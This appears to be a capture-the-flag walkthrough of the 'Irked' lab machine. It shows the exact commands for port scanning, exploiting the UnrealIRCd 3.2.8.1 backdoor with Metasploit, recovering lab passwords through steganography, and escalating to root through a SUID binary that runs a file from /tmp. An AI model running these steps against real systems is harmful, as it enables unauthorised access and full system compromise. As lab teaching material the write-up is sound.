Today, we’re going to solve another CTF machine “Irked”. It is now retired box and can be accessible to VIP member.
Specifications
- Target OS: Linux
- IP Address: 10.10.10.117
- Difficulty: Easy
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step consists of reconnaissance phase as port scanning.
Ports Scanning
During this step we’re gonna identify the target to see what we have behind the IP Address.
nmap -p 1-65535 -T4 -A -v -oA intense-tcp 10.10.10.117
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (EdDSA) 80/tcp open http Apache httpd 2.4.10 ((Debian)) | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 53832/tcp status |_ 100024 1 58245/udp status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 53832/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd
Enumeration
Let’s browse URL http://10.10.10.117/
If we take a look at view-source:http://10.10.10.117/ we found nothing but and image.
Steganography
Let’s wget irked.jpg and enumerate for hidden information inside image.
xxd irked.jpg strings irked.jpg
If we try to extract information with steghide it requires password which is odd.
steghide extract -sf irked.jpg
Let’s keep this aside for now and move ahead.
Exploitation
The nmap scan revels we have UnrealIRCd installed let’s find out which version is it. We can connect to IRC using HexChat and see the response.
It reveled version 3.2.8.1 for UnrealIRCd.
Let’s searchsploit unrealircd and see if there’s any exploit available for this version.
We have bunch of exploits let’s test them.
Metasploit
Let’s fire up msfconsole and search unreal
msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117 rhosts => 10.10.10.117 msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697 rport => 6697
Now let’s exploit and see magic.
We have a restricted shell let’s upgrade our shell using python.
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
We found user.txt flag inside /home/djmardov/Documents but don’t have permission to read it.
[email protected]:/home/djmardov/Documents$ pwd pwd /home/djmardov/Documents [email protected]:/home/djmardov/Documents$ ls -la ls -la total 16 drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 . drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 04:40 .. -rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup -rw------- 1 djmardov djmardov 33 May 15 2018 user.txt [email protected]:/home/djmardov/Documents$ wc -c user.txt wc -c user.txt wc: user.txt: Permission denied
For that we have to spawn our shell as djmardov user to read our flag but if you take a look at .backup file we have read permission.
[email protected]:/home/djmardov/Documents$ cat .backup cat .backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss
It says steg backup password since we found and irked.jpg image and it was password protected we can try extracting information using this password.
Steghide extracted a pass.txt file successfully and it contains another password.
Kab6h+m+bbp2J:HG
We can assume that it’s an SSH password for djmardov because we had SSH port opened. let’s try our luck.
[email protected]:~# ssh [email protected] [email protected]'s password: Kab6h+m+bbp2J:HG [email protected]:~$
Now, we can successfully read user.txt flag.
Privilege Escalation
- Linux Privilege Escalation via SUID Executables using Environment Paths
- Basic Linux Privilege Escalation
We can use scripts to find odd things or we could just manually enumerate for things.
Let’s get started!
[email protected]:~$ sudo -l -bash: sudo: command not found
Let’s find which services and applications are running or to find something interesting.
ps aux | grep root ps -ef | grep root
Let’s find SUID files.
find / -perm -u=s -type f 2>/dev/null
OR
find / -perm -u=s -type f -maxdepth 6 -exec ls -ld {} \; 2>/dev/null
This file /usr/bin/viewuser seems odd because it’s recently modified.
[email protected]:~# /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2019-04-28 22:35 (:0) djmardov pts/2 2019-05-04 05:58 (10.10.14.6)
Now if we execute /usr/bin/viewuser it will run our /tmp/listusers opening a shell as root, because viewuser was being executed as root.
And we got root flag.
[email protected]:~# id uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth) [email protected]:~# wc -c /root/root.txt 33 /root/root.txt
